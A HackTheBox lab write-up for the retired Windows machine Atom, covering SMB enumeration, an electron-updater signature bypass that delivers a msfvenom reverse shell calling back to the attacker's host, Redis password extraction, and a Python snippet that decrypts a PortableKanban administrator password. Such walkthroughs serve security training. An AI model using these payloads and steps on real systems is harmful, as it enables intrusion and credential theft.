<!DOCTYPE html><html lang="en"> <head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>HackTheBox - Atom Writeup · ElleuchX1</title><meta name="description" content="Here's my writeup for the RETIRED machine Atom, Which is a Medium Windows machine!"><link rel="icon" href="/favicon.svg" type="image/svg+xml"><link rel="alternate" type="application/rss+xml" title="ElleuchX1" href="/rss.xml"><meta property="og:title" content="HackTheBox - Atom Writeup · ElleuchX1"><meta property="og:description" content="Here's my writeup for the RETIRED machine Atom, Which is a Medium Windows machine!"><meta property="og:type" content="article"><meta property="og:url" content="https://elleu.ch/posts/htb-atom/"><meta property="og:image" content="https://elleu.ch/og/htb-atom.png"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:image" content="https://elleu.ch/og/htb-atom.png"><script>
      (function () {
        try {
          var t = localStorage.getItem('theme');
          if (!t) t = window.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light';
          document.documentElement.setAttribute('data-theme', t);
        } catch (e) {}
      })();
      document.addEventListener('keydown', function (e) {
        if (e.key !== '/' || e.metaKey || e.ctrlKey || e.altKey) return;
        var t = e.target;
        if (t && (t.tagName === 'INPUT' || t.tagName === 'TEXTAREA' || t.isContentEditable)) return;
        e.preventDefault();
        window.location.href = '/search/';
      });
    </script><link rel="stylesheet" href="/_astro/_id_.mL4ELXTH.css"></head> <body> <a class="skip" href="#main">skip to content</a> <header class="site-header" data-pagefind-ignore> <div class="inner"> <a class="brand" href="/">elleuch<span class="at">:~$</span></a> <nav class="nav" aria-label="Main"> <a href="/posts/" aria-current="page">Posts</a><a href="/tags/">Tags</a><a href="/about/">About</a> <a class="search" href="/search/"><kbd>/</kbd></a> <button class="toggle" id="theme-toggle" type="button" aria-label="Toggle theme"> <svg class="i-moon" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <path d="M21 12.8A9 9 0 1 1 11.2 3a7 7 0 0 0 9.8 9.8z"></path> </svg> <svg class="i-sun" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"> <circle cx="12" cy="12" r="4"></circle> <path d="M12 2v2M12 20v2M4.9 4.9l1.4 1.4M17.7 17.7l1.4 1.4M2 12h2M20 12h2M4.9 19.1l1.4-1.4M17.7 6.3l1.4-1.4"></path> </svg> </button> <script>
  document.getElementById('theme-toggle')?.addEventListener('click', () => {
    const next = document.documentElement.getAttribute('data-theme') === 'dark' ? 'light' : 'dark';
    document.documentElement.setAttribute('data-theme', next);
    try { localStorage.setItem('theme', next); } catch (e) {}
  });
</script> </nav> </div> </header> <main id="main">  <div class="progress" id="progress"></div> <div class="wrap"> <article class="article" data-pagefind-body> <a class="back" href="/posts/">← Posts</a> <header class="article-head"> <h1 data-pagefind-meta="title">HackTheBox - Atom Writeup</h1> <div class="article-meta"> <time datetime="2021-07-10T00:00:00.000Z">2021-07-10</time> <span>3 min read</span> </div> <div class="article-tags"> <a href="/tags/hackthebox/">#HackTheBox</a><a href="/tags/medium/">#Medium</a><a href="/tags/windows/">#Windows</a> </div> </header> <details class="toc" open data-pagefind-ignore> <summary>contents</summary> <ul> <li class="d2"><a href="#nmap-scan">Nmap scan</a></li><li class="d2"><a href="#web-enumeration">Web Enumeration</a></li><li class="d2"><a href="#smb-enumeration">SMB Enumeration </a></li> </ul> </details> <div class="prose">  <h1 id="information-gathering">Information Gathering</h1>
<hr>
<h2 id="nmap-scan">Nmap scan</h2>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo nmap -sC -sV 10.10.10.237 -v</span></span></code></pre>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>80/tcp  open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)</span></span>
<span class="line"><span>| http-methods: </span></span>
<span class="line"><span>|   Supported Methods: GET POST OPTIONS HEAD TRACE</span></span>
<span class="line"><span>|_  Potentially risky methods: TRACE</span></span>
<span class="line"><span>|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27</span></span>
<span class="line"><span>|_http-title: Heed Solutions</span></span>
<span class="line"><span>135/tcp open  msrpc        Microsoft Windows RPC</span></span>
<span class="line"><span>443/tcp open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)</span></span>
<span class="line"><span>| http-methods: </span></span>
<span class="line"><span>|   Supported Methods: GET POST OPTIONS HEAD TRACE</span></span>
<span class="line"><span>|_  Potentially risky methods: TRACE</span></span>
<span class="line"><span>|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27</span></span>
<span class="line"><span>|_http-title: Heed Solutions</span></span>
<span class="line"><span>| ssl-cert: Subject: commonName=localhost</span></span>
<span class="line"><span>| Issuer: commonName=localhost</span></span>
<span class="line"><span>| Public Key type: rsa</span></span>
<span class="line"><span>| Public Key bits: 1024</span></span>
<span class="line"><span>| Signature Algorithm: sha1WithRSAEncryption</span></span>
<span class="line"><span>| Not valid before: 2009-11-10T23:48:47</span></span>
<span class="line"><span>| Not valid after:  2019-11-08T23:48:47</span></span>
<span class="line"><span>| MD5:   a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0</span></span>
<span class="line"><span>|_SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6</span></span>
<span class="line"><span>|_ssl-date: TLS randomness does not represent time</span></span>
<span class="line"><span>| tls-alpn: </span></span>
<span class="line"><span>|_  http/1.1</span></span>
<span class="line"><span>445/tcp open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)</span></span>
<span class="line"><span></span></span></code></pre>
<h2 id="web-enumeration">Web Enumeration</h2>
<img decoding="async" loading="lazy" alt="web" src="/assets/img/htb-atom/web.webp">
<p>It’s a static page with an executeable to download, but nothing interesting! Let’s keep enumerating</p>
<h2 id="smb-enumeration"><p>SMB Enumeration </p></h2>
<img decoding="async" loading="lazy" alt="smb" src="/assets/img/htb-atom/smb.webp">
<p>An interesting share <code>Software_Updates</code> let’s take a look at it</p>
<img decoding="async" loading="lazy" alt="foothold" src="/assets/img/htb-atom/foothold.webp">
<p>Let’s try download everything</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>prompt off</span></span>
<span class="line"><span>recurse on</span></span>
<span class="line"><span>mget *</span></span></code></pre>
<img decoding="async" loading="lazy" alt="smbfiles" src="/assets/img/htb-atom/smbfiles.webp">
We only have a pdf file!
<hr>
<h1 id="foothold">Foothold</h1>
<hr>
<p>Let’s take a look at the pdf file</p>
<img decoding="async" loading="lazy" alt="electron" src="/assets/img/htb-atom/electron.webp">
<img decoding="async" loading="lazy" alt="electron1" src="/assets/img/htb-atom/electron1.webp">
<p>The Heedv1 app is build with <code>electron-builder</code> and also we can drop updates in the client folders in the smb and it get executed.
Searching in  google for an electron builder update rce, we can find an interesting</p>
<blockquote>
<p><a href="https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html">https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html</a></p>
</blockquote>
<p>Let’s first create our shell with the name “s’hell.exe” to bypass the signature</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>msfvenom -p windows/shell_reverse_tcp  lhost=10.10.14.5 lport=9001 -f exe -o "s'hell.exe"</span></span></code></pre>
<p>And also generate the encdoded shasum of our malicious file</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>shasum -a 512 s\'hell.exe | cut -d " " -f1 | xxd -r -p | base64</span></span></code></pre>
<p>Now we’re ready to create our <code>latest.yml</code></p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="yml"><code><span class="line"><span style="color:#85E89D">version</span><span style="color:#E1E4E8">: </span><span style="color:#79B8FF">1.2.3</span></span>
<span class="line"></span>
<span class="line"><span style="color:#85E89D">path</span><span style="color:#E1E4E8">: </span><span style="color:#9ECBFF">http:/IP:PORT/s'hell.exe</span></span>
<span class="line"><span style="color:#85E89D">sha512</span><span style="color:#E1E4E8">: </span><span style="color:#9ECBFF">CZsOB2[-SNIP-]2tW5UhzwqzLVkkpzAbuIw==</span></span></code></pre>
<p>Let’s setup a listener and upload them to the clients folder in the smb! And wait until we get a shell back</p>
<img decoding="async" loading="lazy" alt="foothold" src="/assets/img/htb-atom/foothold.webp">
<p>We’re on the box now! And we can get the user flag !:D</p>
<img decoding="async" loading="lazy" alt="user" src="/assets/img/htb-atom/user.webp">
<hr>
<h1 id="privesc">PrivEsc</h1>
<hr>
<p>Before running any enumerating tool, i always check the Program file, the documents and Downloads folders to check if we have any custom Software  (a aka free win) installed in the system!</p>
<img decoding="async" loading="lazy" alt="portable" src="/assets/img/htb-atom/portable.webp">
<p>We  can copy the whole folder and try to retrieve the encrypted like the machine <code>sharp</code> but let’s keep enumerating!</p>
<blockquote>
<p><a href="https://www.exploit-db.com/exploits/49409">https://www.exploit-db.com/exploits/49409</a></p>
</blockquote>
<img decoding="async" loading="lazy" alt="redis" src="/assets/img/htb-atom/redis.webp">
<p>We can see that Redis is installed, we can grab the redis password from the config file</p>
<img decoding="async" loading="lazy" alt="pass" src="/assets/img/htb-atom/pass.webp">
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>requirepass kidvscat_yes_kidvscat</span></span></code></pre>
<p>Now we can enumerate the redis service!</p>
<p>We will use the redis-tools package</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>sudo apt-get install redis-tools</span></span></code></pre>
<blockquote>
<p>A very good ressource, i’ll use everything from here <a href="https://book.hacktricks.xyz/pentesting/6379-pentesting-redis">https://book.hacktricks.xyz/pentesting/6379-pentesting-redis</a></p>
</blockquote>
<p>Let’s dump the database</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>info</span></span></code></pre>
<img decoding="async" loading="lazy" alt="rd" src="/assets/img/htb-atom/rd.webp">
<p>Let’s list the keys from the db0</p>
<img decoding="async" loading="lazy" alt="rd1" src="/assets/img/htb-atom/rd1.webp">
<p>Let’s check their content
<img decoding="async" loading="lazy" alt="PS" src="/assets/img/htb-atom/PS.webp"></p>
<p>The key <code>pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0</code> seems to give us credentials</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Administrator:Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi</span></span></code></pre>
<p>Seems like it’s an encrypted password! And we already know that we have an exploit to decrypt it ! Lets give it a try</p>
<p>Let’s just take a snippet from the exploit-db exploit</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#6A737D">#!/usr/bin/env python3</span></span>
<span class="line"><span style="color:#F97583">import</span><span style="color:#E1E4E8"> base64</span></span>
<span class="line"><span style="color:#F97583">from</span><span style="color:#E1E4E8"> des </span><span style="color:#F97583">import</span><span style="color:#F97583"> *</span></span>
<span class="line"><span style="color:#F97583">def</span><span style="color:#B392F0"> decode</span><span style="color:#E1E4E8">(hash):</span></span>
<span class="line"><span style="color:#79B8FF">	hash</span><span style="color:#F97583"> =</span><span style="color:#E1E4E8"> base64.b64decode(</span><span style="color:#79B8FF">hash</span><span style="color:#E1E4E8">.encode(</span><span style="color:#9ECBFF">'utf-8'</span><span style="color:#E1E4E8">))</span></span>
<span class="line"><span style="color:#E1E4E8">	key </span><span style="color:#F97583">=</span><span style="color:#E1E4E8"> DesKey(</span><span style="color:#F97583">b</span><span style="color:#9ECBFF">"7ly6UznJ"</span><span style="color:#E1E4E8">)</span></span>
<span class="line"><span style="color:#F97583">	return</span><span style="color:#E1E4E8"> key.decrypt(</span><span style="color:#79B8FF">hash</span><span style="color:#E1E4E8">,</span><span style="color:#FFAB70">initial</span><span style="color:#F97583">=</span><span style="color:#F97583">b</span><span style="color:#9ECBFF">"XuVUm5fR"</span><span style="color:#E1E4E8">,</span><span style="color:#FFAB70">padding</span><span style="color:#F97583">=</span><span style="color:#79B8FF">True</span><span style="color:#E1E4E8">).decode(</span><span style="color:#9ECBFF">'utf-8'</span><span style="color:#E1E4E8">)</span></span>
<span class="line"></span>
<span class="line"><span style="color:#79B8FF">print</span><span style="color:#E1E4E8">(</span><span style="color:#9ECBFF">'[+] Decrypted Password: '</span><span style="color:#F97583">+</span><span style="color:#E1E4E8">decode(</span><span style="color:#9ECBFF">'Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi'</span><span style="color:#E1E4E8">))</span></span></code></pre>
<img decoding="async" loading="lazy" alt="adminpass" src="/assets/img/htb-atom/adminpass.webp">
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>Administrator:kidvscat_admin_@123</span></span></code></pre>
<p>Now let’s login as administrator to the machine</p>
<pre class="astro-code github-dark" style="background-color:#24292e;color:#e1e4e8; overflow-x: auto;" tabindex="0" data-language="plaintext"><code><span class="line"><span>winexe -U 'Administrator%kidvscat_admin_@123' //10.10.10.237 cmd.exe</span></span></code></pre>
<img decoding="async" loading="lazy" alt="toor" src="/assets/img/htb-atom/toor.webp">
<p>And we rooted the machine!</p>  </div> <nav class="pager" aria-label="Post navigation"> <a href="/posts/htb-academy/"><span class="lbl">← prev</span>HackTheBox - Academy Writeup</a> <a class="next" href="/posts/htb-breadcrumbs/"><span class="lbl">next →</span>HackTheBox - Breadcrumbs Writeup</a> </nav> </article> </div> <aside class="toc-rail" data-pagefind-ignore aria-label="Table of contents"> <div class="lbl">contents</div> <ul> <li class="d2"><a href="#nmap-scan">Nmap scan</a></li><li class="d2"><a href="#web-enumeration">Web Enumeration</a></li><li class="d2"><a href="#smb-enumeration">SMB Enumeration </a></li> </ul> </aside><button class="to-top" id="to-top" type="button" aria-label="Back to top">↑ top</button>  </main> <footer class="site-footer" data-pagefind-ignore> <div class="inner"> <span>© 2026 ElleuchX1</span> <span> <a href="https://github.com/ElleuchX1">github</a> ·
<a href="https://twitter.com/ElleuchX1">x</a> ·
<a href="/rss.xml">rss</a> ·
<a href="mailto:contact@elleu.ch">mail</a> </span> </div> </footer> </body></html> <script>
  (function () {
    // reading progress + back-to-top
    var bar = document.getElementById('progress');
    var top = document.getElementById('to-top');
    function update() {
      var h = document.documentElement;
      var max = h.scrollHeight - h.clientHeight;
      var pct = max > 0 ? h.scrollTop / max : 0;
      if (bar) bar.style.width = pct * 100 + '%';
      if (top) top.classList.toggle('show', h.scrollTop > 600);
    }
    document.addEventListener('scroll', update, { passive: true });
    if (top) top.addEventListener('click', function () { window.scrollTo({ top: 0, behavior: 'smooth' }); });
    update();

    // permalink anchors on headings
    document.querySelectorAll('.prose h2[id], .prose h3[id]').forEach(function (h) {
      var a = document.createElement('a');
      a.className = 'anchor';
      a.href = '#' + h.id;
      a.setAttribute('aria-label', 'Link to this section');
      a.textContent = '#';
      h.appendChild(a);
    });

    // code blocks: language label + copy button
    document.querySelectorAll('.prose pre.astro-code').forEach(function (pre) {
      var wrap = document.createElement('div');
      wrap.className = 'code';
      pre.parentNode.insertBefore(wrap, pre);
      var bar = document.createElement('div');
      bar.className = 'code-bar';
      var lang = pre.getAttribute('data-language') || 'text';
      var span = document.createElement('span');
      span.className = 'code-lang';
      span.textContent = lang;
      var btn = document.createElement('button');
      btn.type = 'button';
      btn.className = 'copy';
      btn.textContent = 'copy';
      btn.addEventListener('click', function () {
        var text = pre.innerText;
        var done = function () { btn.textContent = 'copied'; setTimeout(function () { btn.textContent = 'copy'; }, 1200); };
        if (navigator.clipboard) { navigator.clipboard.writeText(text).then(done, done); }
        else {
          var ta = document.createElement('textarea'); ta.value = text; document.body.appendChild(ta); ta.select();
          try { document.execCommand('copy'); } catch (e) {} ta.remove(); done();
        }
      });
      bar.appendChild(span);
      bar.appendChild(btn);
      wrap.appendChild(bar);
      wrap.appendChild(pre);
    });
  })();
</script>